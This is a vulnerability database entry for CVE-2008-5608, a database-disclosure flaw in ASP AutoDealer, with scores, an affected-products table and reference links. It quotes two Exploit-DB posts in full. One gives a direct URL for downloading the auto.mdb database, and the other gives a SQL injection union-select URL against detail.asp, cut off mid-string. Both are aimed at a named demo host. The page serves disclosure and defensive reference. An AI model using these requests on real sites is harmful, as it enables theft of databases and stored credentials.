CVE-2008-5608
Published 2008-12-16
Priority: P3 (35) · Severity: medium · CVSS 2.0: 5
Vector: AV:N/AC:L/Au:N/C:P/I:N/A:N
EXPLOIT
EPSS: 2.85% (85.0th percentile)
ASP AutoDealer stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file via a direct request for auto.mdb.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| aspapps | asp_autodealer | — | — |
No detection rules found.
Exploit-DB
ASP AutoDealer - Remote Database Disclosure
exploitdb·2008-12-06
---
[~] ASPAutoDealer DD Remote Vuln.
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu msn: [email protected]
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] Note: loneliness lost its meaning in my loneliness : ( (
[~] -----------------------------------------------------------
exp for demo: ( DD )
http://demo.merlix.com/autodealer/auto.mdb
[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke
[~]
[~] yildirimordulari.org & darkc0de.com
[~]
[~]----------------------------------------------------------------------
note: DD First submission /str0ke
# milw0rm.com [2008-12-06]
Exploit-DB
ASP AutoDealer - SQL Injection / File Disclosure
exploitdb·2008-12-05
---
###########################################################################
#-----------------------------OffensiveTrack------------------------------#
###########################################################################
---------------------------- Tunisia Muslim ------------------------------
#found by : OffensiveTrack
#Author : AlpHaNiX
#website : www.offensivetrack.org
#contact : AlpHa[AT]HACKER[DOT]BZ
###########################################################################
#script : Merlix ASP AutoDealer
#download : null
#Demo : http://demo.merlix.com/autodealer/
#Exploits :
--=[SQL INJECTION]=--
http://demo.merlix.com/autodealer/detail.asp?ID=-0+union+select+1,null,null,0,null,CDDoorID,null,null,null,null,CDDoo
No writeups or analysis indexed.
http://securityreason.com/securityalert/4754
https://exchange.xforce.ibmcloud.com/vulnerabilities/47124
https://www.exploit-db.com/exploits/7356
https://www.exploit-db.com/exploits/7360
Published: 2008-12-16